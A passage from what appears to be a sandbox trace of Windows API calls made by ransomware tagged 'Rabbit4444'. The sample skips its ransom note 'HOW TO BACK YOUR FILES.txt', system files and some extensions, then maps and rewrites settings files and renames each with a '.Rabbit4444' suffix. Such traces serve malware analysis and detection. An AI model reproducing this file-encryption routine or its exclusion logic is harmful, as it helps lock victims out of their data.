(lpString1="Classic_{e9950154-c418-419e-a90a-20c5287ae24b}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.618] lstrcmpiW (lpString1="Classic_{e9950154-c418-419e-a90a-20c5287ae24b}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.618] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{e9950154-c418-419e-a90a-20c5287ae24b}.settingcontent-ms" | out: lpString1="Classic_{e9950154-c418-419e-a90a-20c5287ae24b}.settingcontent-ms") returned="Classic_{e9950154-c418-419e-a90a-20c5287ae24b}.settingcontent-ms" [0059.618] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{e9950154-c418-419e-a90a-20c5287ae24b}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.618] lstrlenW (lpString="Classic_{e9950154-c418-419e-a90a-20c5287ae24b}.settingcontent-ms") returned 64 [0059.618] lstrlenW (lpString="Rabbit4444") returned 10 [0059.618] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.618] lstrlenW (lpString=".dll") returned 4 [0059.618] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.618] lstrlenW (lpString=".lnk") returned 4 [0059.618] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.618] lstrlenW (lpString=".ini") returned 4 [0059.618] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.618] lstrlenW (lpString=".sys") returned 4 [0059.619] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.619] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{e9950154-c418-419e-a90a-20c5287ae24b}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{e9950154-c418-419e-a90a-20c5287ae24b}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.619] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.619] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15092966077) returned 1 [0059.619] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1077) returned 1 [0059.619] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0059.619] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c00 [0059.619] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x740, lpName=0x0) returned 0x298 [0059.620] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x740) returned 0x70000 [0059.621] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.621] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0059.621] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.621] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0059.621] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.621] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0059.621] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.621] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0059.621] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15093217197) returned 1 [0059.621] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0059.622] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c00 | out: hHeap=0xe0000) returned 1 [0059.622] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.622] CloseHandle (hObject=0x298) returned 1 [0059.622] CloseHandle (hObject=0x278) returned 1 [0059.622] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{e9950154-c418-419e-a90a-20c5287ae24b}.settingcontent-ms.Rabbit4444") returned 192 [0059.622] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{e9950154-c418-419e-a90a-20c5287ae24b}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{e9950154-c418-419e-a90a-20c5287ae24b}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{e9950154-c418-419e-a90a-20c5287ae24b}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{e9950154-c418-419e-a90a-20c5287ae24b}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.623] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56ec1d51, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x56ec1d51, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23183f67, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x39b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{E9C71548-B580-43B2-ACDB-1BA924002754}.settingcontent-ms", cAlternateFileName="CL4EBE~1.SET")) returned 1 [0059.623] lstrcmpiW (lpString1="Classic_{E9C71548-B580-43B2-ACDB-1BA924002754}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.623] lstrcmpiW (lpString1="Classic_{E9C71548-B580-43B2-ACDB-1BA924002754}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.623] lstrcmpiW (lpString1="Classic_{E9C71548-B580-43B2-ACDB-1BA924002754}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.623] lstrcmpiW (lpString1="Classic_{E9C71548-B580-43B2-ACDB-1BA924002754}.settingcontent-ms", lpString2=".") returned 1 [0059.623] lstrcmpiW (lpString1="Classic_{E9C71548-B580-43B2-ACDB-1BA924002754}.settingcontent-ms", lpString2="..") returned 1 [0059.623] lstrcmpiW (lpString1="Classic_{E9C71548-B580-43B2-ACDB-1BA924002754}.settingcontent-ms", lpString2="windows") returned -1 [0059.623] lstrcmpiW (lpString1="Classic_{E9C71548-B580-43B2-ACDB-1BA924002754}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.623] lstrcmpiW (lpString1="Classic_{E9C71548-B580-43B2-ACDB-1BA924002754}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.623] lstrcmpiW (lpString1="Classic_{E9C71548-B580-43B2-ACDB-1BA924002754}.settingcontent-ms", lpString2="boot") returned 1 [0059.623] lstrcmpiW (lpString1="Classic_{E9C71548-B580-43B2-ACDB-1BA924002754}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.623] lstrcmpiW (lpString1="Classic_{E9C71548-B580-43B2-ACDB-1BA924002754}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.623] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{E9C71548-B580-43B2-ACDB-1BA924002754}.settingcontent-ms" | out: lpString1="Classic_{E9C71548-B580-43B2-ACDB-1BA924002754}.settingcontent-ms") returned="Classic_{E9C71548-B580-43B2-ACDB-1BA924002754}.settingcontent-ms" [0059.623] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{E9C71548-B580-43B2-ACDB-1BA924002754}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.623] lstrlenW (lpString="Classic_{E9C71548-B580-43B2-ACDB-1BA924002754}.settingcontent-ms") returned 64 [0059.623] lstrlenW (lpString="Rabbit4444") returned 10 [0059.623] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.623] lstrlenW (lpString=".dll") returned 4 [0059.623] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.623] lstrlenW (lpString=".lnk") returned 4 [0059.623] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.623] lstrlenW (lpString=".ini") returned 4 [0059.623] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.624] lstrlenW (lpString=".sys") returned 4 [0059.624] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.624] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{E9C71548-B580-43B2-ACDB-1BA924002754}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{e9c71548-b580-43b2-acdb-1ba924002754}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.624] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.624] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15093468186) returned 1 [0059.624] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=923) returned 1 [0059.624] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0059.624] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0059.624] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6a0, lpName=0x0) returned 0x298 [0059.629] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6a0) returned 0x70000 [0059.630] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.630] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0059.630] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.630] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0059.630] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.631] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0059.631] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.631] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0059.631] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15094146277) returned 1 [0059.631] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0059.631] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0059.631] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.631] CloseHandle (hObject=0x298) returned 1 [0059.631] CloseHandle (hObject=0x278) returned 1 [0059.631] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{E9C71548-B580-43B2-ACDB-1BA924002754}.settingcontent-ms.Rabbit4444") returned 192 [0059.631] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{E9C71548-B580-43B2-ACDB-1BA924002754}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{e9c71548-b580-43b2-acdb-1ba924002754}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{E9C71548-B580-43B2-ACDB-1BA924002754}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{e9c71548-b580-43b2-acdb-1ba924002754}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.632] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56f5a6c0, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x56f5a6c0, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x232b5237, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4ec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{EBEC2956-F512-474D-8631-9E753CC40653}.settingcontent-ms", cAlternateFileName="CL2C4A~1.SET")) returned 1 [0059.632] lstrcmpiW (lpString1="Classic_{EBEC2956-F512-474D-8631-9E753CC40653}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.632] lstrcmpiW (lpString1="Classic_{EBEC2956-F512-474D-8631-9E753CC40653}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.632] lstrcmpiW (lpString1="Classic_{EBEC2956-F512-474D-8631-9E753CC40653}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.632] lstrcmpiW (lpString1="Classic_{EBEC2956-F512-474D-8631-9E753CC40653}.settingcontent-ms", lpString2=".") returned 1 [0059.632] lstrcmpiW (lpString1="Classic_{EBEC2956-F512-474D-8631-9E753CC40653}.settingcontent-ms", lpString2="..") returned 1 [0059.632] lstrcmpiW (lpString1="Classic_{EBEC2956-F512-474D-8631-9E753CC40653}.settingcontent-ms", lpString2="windows") returned -1 [0059.632] lstrcmpiW (lpString1="Classic_{EBEC2956-F512-474D-8631-9E753CC40653}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.632] lstrcmpiW (lpString1="Classic_{EBEC2956-F512-474D-8631-9E753CC40653}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.632] lstrcmpiW (lpString1="Classic_{EBEC2956-F512-474D-8631-9E753CC40653}.settingcontent-ms", lpString2="boot") returned 1 [0059.632] lstrcmpiW (lpString1="Classic_{EBEC2956-F512-474D-8631-9E753CC40653}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.632] lstrcmpiW (lpString1="Classic_{EBEC2956-F512-474D-8631-9E753CC40653}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.632] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{EBEC2956-F512-474D-8631-9E753CC40653}.settingcontent-ms" | out: lpString1="Classic_{EBEC2956-F512-474D-8631-9E753CC40653}.settingcontent-ms") returned="Classic_{EBEC2956-F512-474D-8631-9E753CC40653}.settingcontent-ms" [0059.632] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{EBEC2956-F512-474D-8631-9E753CC40653}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.632] lstrlenW (lpString="Classic_{EBEC2956-F512-474D-8631-9E753CC40653}.settingcontent-ms") returned 64 [0059.632] lstrlenW (lpString="Rabbit4444") returned 10 [0059.633] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.633] lstrlenW (lpString=".dll") returned 4 [0059.633] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.633] lstrlenW (lpString=".lnk") returned 4 [0059.633] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.633] lstrlenW (lpString=".ini") returned 4 [0059.633] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.633] lstrlenW (lpString=".sys") returned 4 [0059.633] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.633] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{EBEC2956-F512-474D-8631-9E753CC40653}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{ebec2956-f512-474d-8631-9e753cc40653}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.633] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.633] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15094386997) returned 1 [0059.633] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1260) returned 1 [0059.633] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0059.633] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101408 [0059.633] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7f0, lpName=0x0) returned 0x298 [0059.634] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7f0) returned 0x70000 [0059.635] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.635] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0059.635] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.635] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0059.635] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.635] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0059.636] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.636] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0059.636] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15094634632) returned 1 [0059.636] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0059.636] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101408 | out: hHeap=0xe0000) returned 1 [0059.636] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.636] CloseHandle (hObject=0x298) returned 1 [0059.636] CloseHandle (hObject=0x278) returned 1 [0059.636] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{EBEC2956-F512-474D-8631-9E753CC40653}.settingcontent-ms.Rabbit4444") returned 192 [0059.636] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{EBEC2956-F512-474D-8631-9E753CC40653}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{ebec2956-f512-474d-8631-9e753cc40653}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{EBEC2956-F512-474D-8631-9E753CC40653}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{ebec2956-f512-474d-8631-9e753cc40653}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.637] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56ff302e, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x56ff302e, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23052c93, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x40d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{ecdb0924-4208-451e-8ee0-373c0956de16}.settingcontent-ms", cAlternateFileName="CLB35B~1.SET")) returned 1 [0059.637] lstrcmpiW (lpString1="Classic_{ecdb0924-4208-451e-8ee0-373c0956de16}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.637] lstrcmpiW (lpString1="Classic_{ecdb0924-4208-451e-8ee0-373c0956de16}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.637] lstrcmpiW (lpString1="Classic_{ecdb0924-4208-451e-8ee0-373c0956de16}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.637] lstrcmpiW (lpString1="Classic_{ecdb0924-4208-451e-8ee0-373c0956de16}.settingcontent-ms", lpString2=".") returned 1 [0059.637] lstrcmpiW (lpString1="Classic_{ecdb0924-4208-451e-8ee0-373c0956de16}.settingcontent-ms", lpString2="..") returned 1 [0059.637] lstrcmpiW (lpString1="Classic_{ecdb0924-4208-451e-8ee0-373c0956de16}.settingcontent-ms", lpString2="windows") returned -1 [0059.637] lstrcmpiW (lpString1="Classic_{ecdb0924-4208-451e-8ee0-373c0956de16}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.637] lstrcmpiW (lpString1="Classic_{ecdb0924-4208-451e-8ee0-373c0956de16}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.637] lstrcmpiW (lpString1="Classic_{ecdb0924-4208-451e-8ee0-373c0956de16}.settingcontent-ms", lpString2="boot") returned 1 [0059.637] lstrcmpiW (lpString1="Classic_{ecdb0924-4208-451e-8ee0-373c0956de16}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.637] lstrcmpiW (lpString1="Classic_{ecdb0924-4208-451e-8ee0-373c0956de16}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.637] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{ecdb0924-4208-451e-8ee0-373c0956de16}.settingcontent-ms" | out: lpString1="Classic_{ecdb0924-4208-451e-8ee0-373c0956de16}.settingcontent-ms") returned="Classic_{ecdb0924-4208-451e-8ee0-373c0956de16}.settingcontent-ms" [0059.637] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{ecdb0924-4208-451e-8ee0-373c0956de16}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.637] lstrlenW (lpString="Classic_{ecdb0924-4208-451e-8ee0-373c0956de16}.settingcontent-ms") returned 64 [0059.637] lstrlenW (lpString="Rabbit4444") returned 10 [0059.638] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.638] lstrlenW (lpString=".dll") returned 4 [0059.638] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.638] lstrlenW (lpString=".lnk") returned 4 [0059.638] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.638] lstrlenW (lpString=".ini") returned 4 [0059.638] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.638] lstrlenW (lpString=".sys") returned 4 [0059.638] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.638] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{ecdb0924-4208-451e-8ee0-373c0956de16}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{ecdb0924-4208-451e-8ee0-373c0956de16}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.638] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.638] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15094893419) returned 1 [0059.638] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1037) returned 1 [0059.638] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0059.638] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101b78 [0059.638] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x710, lpName=0x0) returned 0x298 [0059.639] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x710) returned 0x70000 [0059.640] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.640] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0059.640] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.640] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0059.640] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.640] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0059.641] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.641] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0059.641] QueryPerformanceCounter (in: 